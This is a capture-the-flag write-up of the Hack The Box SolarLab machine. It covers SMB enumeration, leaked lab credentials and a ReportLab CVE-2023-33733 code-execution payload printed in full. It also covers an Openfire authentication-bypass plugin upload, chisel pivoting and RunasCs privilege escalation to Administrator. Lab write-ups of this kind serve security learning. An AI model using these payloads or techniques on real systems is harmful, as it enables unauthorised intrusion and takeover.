# 
Hello hackers today i wanted to share with a simple writeup of one of seasonal 5 machines.Actually season 5 is very sweet so far because this time am getting better in windows machines especially AD and some most diffucts linux machines.
## **Description:**
SolarLab is a medium easy from season 5 (windows machine) by **LazyTitan23**, which were required to hack it and get access to the administrator.What i love from this box is that it has one of the exploit I did from one of the machine we hacked during season 4 (savage land) if not mistaken the box was **JAB**.
Let the hack begin.
## SCANNING
I started by scanning the whole network with nmap.
## ENUMERATION
After nmap with all port done because i didn't want to make sure that am skipping anything i waited the all port scanning is done here.
Then i decided to do some enumeration one port after another.
### ENUMERATING PORT 80
```
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack nginx 1.24.0
|_http-title: Did not follow redirect to http://solarlab.htb/
|_http-server-header: nginx/1.24.0
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
```
With port 80 we can see that we got a subdomain but also a http-server-header, what was so important for me was a domain. So i Decided to add it to the hosts file and browser to the domain name.
I didn't get much info, so i decide to brute force directories and subdomains at the same time and see what i will get.
Bad enought i ended up with a subdomain report.solarlab.htb,I didn't get any directory that was usufully.
### ENUMERATING SMB
Since I saw a smb port running i decide to enumerate it also hoping i will get something cool info.
```
┌──(alienx㉿alienX)-[~/Desktop/MACHINES/SOLARLAB]
└─$ smbclient -L 10.10.11.16
Password for [WORKGROUP\alienx]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Documents Disk
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.16 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```
From we can see that other share needs password access but the only one we can login/access with anonymous was 'Documents' share.
I decided to download some of the few decuments and see if is usufully for me.
From the documents that gave me some juice info was the 'details-file.xlsx' file.
```
Password for [WORKGROUP\alienx]:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Fri May 17 05:02:39 2024
.. DR 0 Fri May 17 05:02:39 2024
concepts D 0 Fri Apr 26 10:41:57 2024
desktop.ini AHS 278 Fri Nov 17 05:54:43 2023
details-file.xlsx A 12793 Fri Nov 17 07:27:21 2023
LPUJYTWMSH D 0 Fri May 17 05:02:39 2024
My Music DHSrn 0 Thu Nov 16 14:36:51 2023
My Pictures DHSrn 0 Thu Nov 16 14:36:51 2023
My Videos DHSrn 0 Thu Nov 16 14:36:51 2023
old_leave_request_form.docx A 37194 Fri Nov 17 05:35:57 2023
7779839 blocks of size 4096. 1844829 blocks available
smb: \> mget details-file.xlsx
Get file details-file.xlsx? yes
getting file \details-file.xlsx of size 12793 as details-file.xlsx (21.0 KiloBytes/sec) (average 21.0 KiloBytes/sec)
smb: \> exit
```
from the excel we can see we got some of the info such as username,password and emails(lets record them somewhere and continue with our enumeration). I decided to forcus with the username and password first here.
```
## from Documents
users & their pass
1. blake.byte (ThisCanB3typedeasily1@)
2. AlexanderK (danenacia9234n)
3. ClaudiaS (dadsfawe9dafkn)
```
I wasn't done with smb LOL,So i went again and try with crackmapexec, crackmapexec is nice tool for enumeration, instead of using smbclient we can also use crackmapexec to do all those stuffs.
I decided to check for users but go nothing and decided to check for RIDs
```
crackmapexec smb 10.10.11.16 -u 'user' -p 'PASS' --rid-brute
SMB 10.10.11.16 445 SOLARLAB [*] Windows 10 / Server 2019 Build 19041 x64 (name:SOLARLAB) (domain:solarlab) (signing:False) (SMBv1:False)
SMB 10.10.11.16 445 SOLARLAB [+] solarlab\user:PASS
SMB 10.10.11.16 445 SOLARLAB [+] Brute forcing RIDs
SMB 10.10.11.16 445 SOLARLAB 500: SOLARLAB\Administrator (SidTypeUser)
SMB 10.10.11.16 445 SOLARLAB 501: SOLARLAB\Guest (SidTypeUser)
SMB 10.10.11.16 445 SOLARLAB 503: SOLARLAB\DefaultAccount (SidTypeUser)
SMB 10.10.11.16 445 SOLARLAB 504: SOLARLAB\WDAGUtilityAccount (SidTypeUser)
SMB 10.10.11.16 445 SOLARLAB 513: SOLARLAB\None (SidTypeGroup)
SMB 10.10.11.16 445 SOLARLAB 1000: SOLARLAB\blake (SidTypeUser)
SMB 10.10.11.16 445 SOLARLAB 1001: SOLARLAB\openfire (SidTypeUser)
```
N/B: After analyzing my data i decided to connect some dots, initially from smbclient i got a excel file with some username and one of them was user 'blake' also here now after using crackmapexec I get the same user, so this means we need to find somewhere where we can login with this user. Now my next guess here was that from the crackmapexec i can see a user '**openfire**', what i know is that once you see user openfire probably you should know that there is either a service under port 9090 or 9091 internal on the server or inside the machine you have to do some pivoting and access this service which is also vulnerable.
And this user openfire gives me a clue that once i get access inside the machine my next step will be doing some pivoting(that was my general overview once i saw this user), Now lets see how this goes.
### ENUMERATING PORT 6791
```
6791/tcp open http syn-ack nginx 1.24.0
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://report.solarlab.htb:6791/
|_http-server-header: nginx/1.24.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```
from here we find a subdomain and a port number, I added this one into my hosts file and decided to give it a try.
```
url: http://report.solarlab.htb:6791/
```
Now we have a reportHub interface, but we need valid credentials to login here.
I tried the creds from the excel but they didn't work but, And i decide to try harder to make a small twist on the username instead of "blake" to "blakeb"
Creds
```
1. blake.byte (ThisCanB3typedeasily1@)
username: blakeb
password:ThisCanB3typedeasily1@
```
Now we can login
ReportHub is used to generate a pdf file by either uploadind a image or even a html file.
A little google such about reportHub vulnerability i found this one from github.[cve](https://github.com/c53elyas/CVE-2023-33733).
After some analysis about each endpoint with burp i found that we have two endpoint which can give us the same goal which was RCE.
With '**leaverequest**' there is a file upload vulnlability, I will go with a simple method here, Actually the endpoint that was easy exploitable was '**travelRequest**'.
After checking the burp-suite history i decided to forward this request to repeater
Now from the CVE above at the bottom there is a PoC, i decide to edit it and use it
The PoC say we can create a malicious file.html and add our malicious html code inside that will try to exploit the python libary. So instead of creating a payload am going to just put my powershell payload there, no time to upload.
payload:
```
<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('payload here') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">
exploit
</font></para>
```
## EXPLOITATION
### EXPLOITING reportHub
I went and glab the base64 encoded powershell script and added to the payload .
Finally my payload looked like this after beutifying it like a noob LOL. There is a simple technique you need to use while encoding unless otherwise you wont get a shell("Thanks to **@blackninja23** took his time those days to teach me this and and he made sure i understand this method of encoding powershell script because i was struggling with this for a long time"), just do a simple google.
Now lets get a shell.
On the blake home directory you can glab your user flag.
## LATERAL MOVEMENT
With lateral movement i started checking for interesting users and localgroup, But nothing was usufull here apart from openfire user.
Now here the only user who was interesting was "**openfire**", What we were supposed to do here was first get a shell as user "**openfire**" by doing some pivoting technique and then find a way to get to administrator.
Now here i didn't even want to google because i know openfire service is running internal under port "9090 and 9091", i decided to confim this by using the command below.
```
PS C:\users\blake\desktop> netstat -ano | findstr "9090"
TCP 127.0.0.1:9090 0.0.0.0:0 LISTENING 2244
PS C:\users\blake\desktop> netstat -ano | findstr "9090"
TCP 127.0.0.1:9090 0.0.0.0:0 LISTENING 2244
PS C:\users\blake\desktop> netstat -ano | findstr "9091"
TCP 127.0.0.1:9091 0.0.0.0:0 LISTENING 2244
PS C:\users\blake\desktop>
```
I knew directly that In order to access this ports "9090 and 9091" I need to do some portforwading and there is where pivoting is comming into hands.We can't access this port because is running in an internal network so the only path for me to access was this computer I had access on("blake computer").
## PIVOTING
### uploading chisel
Am going to use chisel on both local machine and on the target machine.
I decided to get multiple shells because once one crush, i will use the others.
I will do forwarding on my localmachine on both port 9090 and 9091.
Lets decode to access these ports and see if is there really running openfire service.
```
url:http://127.0.0.1:9090/login.jsp?url=%2Findex.jsp
```
### Exploiting openfire
So far we have openfire service at our local machine, but good enough is that the openfire version is vulnerable to Authentication Bypass which leds to remote code execution by uploading a vulnerable plugin and we get RCE simple as that, all this I learned from seosanal 4, from JAB machine.
```
Openfire, Version: 4.7.4
```
Google-fu and found this CVE-2023-32315 and i decided to clone it.
Now i decided to run the exploit in order to create a valid administrator username and password.
use the credential being generate to login in to the openfire.
N/B: something to note down is that the python CVE or script generates a random username and password but also if you can understand what the python script does inside it, you can try to modify it and make it generate the username and password of your choise.
### Getting a shell as openfire.
First of all we need to upload a vulnerable plugin which will give us a password which we will use to acces the console. You may find it diffucult but it is very easy if you had done the JAB machine.
### upload a vulnerable plugin
Then i decided to upload the plugin, its a java plugin because openfire is using java programming language.
After uploading now i was good to go.
The plugin show you the location(Management Tool) where you can find it but also it give you the pass i.e ("**123**").
Easiest way to find a plugin location is clicking server ---> server_setting--> Management tools
Now lets find a console, click find home page and then system command.
Now from here i was able to executing command as openfire.
### getting a reverse shell
Lets get a shell because the environment is limited to us, As usually i beautified my powershell paylod and at the same time i initiated the listerner on my local machine.
payload:
```
powershell -e YourPayloadHere
```
How sweet this machine it was , It was really fun and interesting.
## PRIVILEGE ESCALATION
Also privilege escalation was interesting, I don't know whether I did in an intendend way or what i will have to find "**LazyTitan23**" himself and ask him after the machine expires.
### privilege escalation and runas script
I didn't find much info about user openfire after reaching here.
But while i was in the "program files" looking for any juice program file to exploit I got an idea of trying runasCs script. And decided to give it a try.
My idea was like this,since because i have **blake** password,which means i can user this **password** with the **runasCs** scipt to try to execute command and see which user will the system respond with.
i.e
As you can see i have successful executed commands as administrator, now lets a shell as administrator.
### uploading nc binary
And then listern on port 1234 on my local machine
```
C:\Windows\system32>cd c:\users\administrator\desktop
cd c:\users\administrator\desktop
c:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 385E-AC57
Directory of c:\Users\Administrator\Desktop
05/03/2024 02:32 PM <DIR> .
05/03/2024 02:32 PM <DIR> ..
05/17/2024 10:38 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 7,737,708,544 bytes free
c:\Users\Administrator\Desktop>
```
Sign in with Wallet
Connect another wallet